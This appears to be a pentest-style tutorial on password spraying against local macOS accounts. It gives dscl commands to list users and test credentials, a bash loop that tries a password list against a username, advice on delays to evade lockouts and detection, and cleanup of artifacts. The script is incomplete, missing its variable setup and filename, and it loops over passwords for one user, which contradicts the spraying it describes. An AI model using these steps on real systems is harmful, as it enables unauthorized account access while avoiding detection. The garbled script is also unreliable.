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Password Spraying

A password spraying attack involves attempting a single password across multiple user accounts to avoid account lockouts. This attack can target local accounts on a macOS system.


  • A list of valid usernames.
  • A single password or a small set of passwords for spraying.

Gather a User List (if needed)

dscl . list /Users

Save the list to a file for iteration:

dscl . list /Users > userlist.txt

Performing the Password Spraying Attack

The dscl command can be used to authenticate users:

dscl . auth <username> <password>

Successful output indicates valid credentials.

Automating the Spraying

Write a script to iterate through passwords with a single username:



while IFS= read -r password; do
echo -n "[+] Testing password: $password ......"
dscl . auth "$username" "$password" &>/dev/null && echo "Success $username:$password" || echo "Failed"
done < "$passwordlist"

Save the script as and make it executable:

chmod +x

Run the script:


Monitoring and Avoiding Detection

Bypass Detection

  • Test one password at a time across multiple accounts to avoid lockouts.

  • Introduce delays between attempts:

    sleep 5

Monitor for Detection

Check logs for unusual activity:

sudo tail -f /var/log/system.log | grep -i "authentication"

Post-Attack Cleanup

  • Remove user lists or any generated artifacts:
rm userlist.txt


  • Local accounts may have stronger password policies or different authentication mechanisms.
  • macOS has built-in protections, such as account lockout and delayed authentication responses, which may hinder spraying attempts.